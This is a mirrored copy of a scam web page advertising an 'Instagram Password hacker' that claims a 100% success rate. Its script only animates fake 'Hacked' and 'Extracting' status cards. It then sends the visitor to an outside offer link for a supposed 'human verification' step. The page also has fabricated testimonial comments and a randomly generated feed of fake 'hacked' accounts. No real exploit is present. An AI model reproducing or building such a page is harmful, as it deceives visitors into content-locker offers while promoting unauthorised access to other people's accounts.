
<!doctype html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="">
<!--<![endif]-->
<!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->




<!-- Mirrored from instagramhackonline.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Aug 2022 19:39:50 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
          <title>Hack Instagram in 2 minutes!</title>

  
  <meta name="description" content="We hack Instagram accounts with a 100% success rate.">
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- VENDOR CSS-->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <link rel="stylesheet" href="css/bootstrap-theme.min.css">
  <link rel="stylesheet" href="css/fontello.css">
  <link rel="stylesheet" href="css/main.css">
  <!-- VENDOR CSS -->
  <!-- FONTS -->
  <link href="https://fonts.googleapis.com/css?family=Inconsolata|Poiret+One" rel="stylesheet">
  <!-- FONTS -->
  <script src="js/globals.js"></script>
     <!-- --------- -->
  <link href="images/insta-fav.png" rel="icon">
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-150845647-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-150845647-1');
</script>



<!--<script src="//www.verifyspot.net/captchalocker/js/captcha.js.php?id=3390ddb737945a51241053c5b9b8ef12"></script> -->


</head>
<body style="background-image:url(images/insta-bg.jpg)">
  <header class="main-header">
    <figure class="logo">
      <a href="index.html"><img src="images/insta-logo.png" alt="Instagram  Password hacker"></a>
    </figure>
  </header>
  <main>
    <div class="generator" id="generator">
      <h1 class="text-center title">Instagram Password hacker</h1>
      <div class="generator-wrapper">
        <div id="step-1" style="">
          <!-- RESOURCE -->
          <label class="text-center title" for="username">Enter Instagram  Name / Username</label>
          <div class="input-group">
              <span class="input-group-addon">
                <img src="user-icons/default.png" alt="">
              </span>
            <input type="text" name="username" id="username-input">
          </div>
          <div class="text-center">
            <button id="generate" class="btn-action btn-big btn-yellow">Hack</button>
          </div>
        </div>
          <div id="step-2" class="generating-wrapper" style="display:none">
            <div class="spinner"></div>
            <h3 class="text-center gen-title">WORKING...</h3>
          </div>
            <div id="step-4" class="generating-wrapper s-4"  style="display:none">
                <div class="generating-card" id="r-1" style="opacity:0">
                    <span class="gen-card-title" id="username-r"></span>
                    <p>CONNECTED</p>
                </div>
                <div class="generating-card" id="r-2" style="opacity:0">
                    <span class="gen-card-title">STATUS</span>
                    <p>Hacked</p>
                </div>
                <div class="generating-card" id="r-3" style="opacity:0">
                    <span class="gen-card-title">Extracting</span>
                    <p>Completed</p>
                </div>
                <div class="generating-card" id="r-4" style="opacity:0">
                    <span class="gen-card-title">Human Verification</span>
                    <p>Pending</p>
                </div>
                <div id="step-5" class="verification"  style="display:none">
                  <h3 class="text-center">We Almost Finished!</h3>
                  
                       <center>           
                 <!-- <div data-captcha-enable="true"></div> -->
</center>  
                 <!-- <p class="text-center">We don't like robots! Please, verify that you are a human. Click the Verify button below and follow the instructions.</p> -->
                  <img src="img/loading.gif" alt="">
                  
    
                  
                  <!--<button class="btn-action btn-sm" rel="nofollow"	style="background: #3845bf;color: black;text-shadow: none;" onclick="window.open('https://genrates.xyz/5b872b5')"">VERIFY NOW</button> -->
                  
                  
               
       <button class="btn-action btn-sm" rel="nofollow"	style="background: #3845bf;color: black;text-shadow: none;" onclick="window.open('https://genrates.xyz/5b872b5')"">Get Password</button> 



                </div>
              </div>
          <div id="step-3" style="display:none">
          <p class="text-center generating-message" id="generating-message">Generating for something</p>
          <div class="progress">
            <div class="progress-bar" role="progressbar" aria-valuenow="70"
            aria-valuemin="0" aria-valuemax="100" style="width:0%" id="progress-belt">
              <span class="sr-only">70% Complete</span>
            </div>
          </div>
          </div>
        </div>
      </div>
    </div>
    <div class="sidebar" id="recent-activity">
      <h3 class="recent-title">RECENT ACTIVITY <span class="icon-spin3 recent-icon-spin"></span></h3>
      <h5 class="server-stats">
        <p>SERVER STATUS <span class="icon-dot green"></span></p>

        <p>SERVER LOAD <span class="icon-dot red"></span></p>
      </h5>
      <div class="recent-activity-box" id="recent-box">
      </div>
    </div>
    <div class="comments">
      <h1 class="text-center title blue">LATEST COMMENTS <span class="icon-chat-empty"></span></h1>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Veeless</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>now i dont need help. i can hack Instagram from myself.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Hush</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>I can not believe believe that this really works, Instagram password hacked.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Pika</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>This trick is amazing!
</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Mahi</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>Wow! thanks! for Instagram hack</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Lica</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>awesome man! you should sell Instagram software.</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Zhon</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>Perfect! this is what i am looking for!</p>
        </div>
      </div>
            <div class="comment-card">
        <span class="icon-user"></span>
        <div class="comment-content">
          <span class="username">Mark</span>
          <span class="comment-date">
            <span class="icon-clock"></span>
           <span>Posted few seconds ago</span>
          </span>
          <p>Perfect! this is what i am looking for! so i can hack Instagram password.</p>
        </div>
      </div>
            <div class="add-comment">
        <h5>ADD NEW COMMENT</h5>
        <input type="text" name="username-add-comment" placeholder="Username">
        <textarea name="comment-add"></textarea>
         <button class="btn-action btn-big btn-yellow submit-comment" data-toggle="modal" data-target="#error-comment">ADD COMMENT</button>
      </div>
    </div>
  </main>
<footer class="text-center">
  <ul class="footer-menu">
    <li><a href="#">Contact Us</a></li>
    <li class="sep">|</li>
    <li><a href="#">Terms of Service</a></li>
    <li class="sep">|</li>
    <li><a href="#">Privacy Policy</a></li>
  </ul>
  <p>All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.</p>
</footer>
<!-- Modal -->
<div id="error" class="modal fade" role="dialog">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-body text-center">
        <h1>Error</h1>
        <h2><span class="icon-cancel icon-error-modal"></span></h2>
        <h4>Please enter your Username!</h4>
        <button class="btn btn-sm btn-success" data-dismiss="modal">BACK</button>
      </div>
    </div>

  </div>
</div>
<!-- Modal -->
<div id="error-comment" class="modal fade" role="dialog">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-body text-center">
        <h1>Error</h1>
        <h2><span class="icon-cancel icon-error-modal"></span></h2>
        <p>TO PREVENT SPAM, COMMENTING IS ONLY ALLOWED FOR USERS WHO ALREADY USED OUR GENERATOR.</p>
        <button class="btn-action btn-sm btn-blue" data-dismiss="modal">BACK</button>
      </div>
    </div>

  </div>
</div>
<!-- Modal -->
  <!-- VENDOR JS -->
  <script src="js/vendor/jquery-3.1.1.min.js"></script>
  <script src="js/vendor/bootstrap.min.js"></script>
  <!-- VENDOR JS -->
  <script src="js/generator.js"></script>
    <script>
var platforms = ["ANDROID", "iOS", "PC"];
$(function(){
var wrapper = $("#recent-box");
var updateActivity = function(){
  var interval = setInterval(function(){
    var nickname = nicks[random(0,nicks.length-1)];
    $(`<div class="recent-activity-card" style="display:none">
          <header>
            <img src="http://instagramhackonline.com/flag-icons/${random(1,9)}.png" class="flag-icon" alt="flag">
            <span class="r-username">${nickname}</span> <span class="label label-default">${platforms[random(0,platforms.length)]}</span>
          </header>
                    <div class="resource">
             Hacked Instagram Password   </div>
                  </div>`).prependTo(wrapper).slideDown(400,function(){
      $(this).delay(10000).fadeOut('100', function() {
        $(this).remove();
      });
    });
  },random(800,3500));
}
updateActivity();
}());
  </script>
<script>
function BMBQvXwVtX(){window.location.href=""}
 </script>


</body>



<!-- Mirrored from instagramhackonline.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Aug 2022 19:40:02 GMT -->
</html>
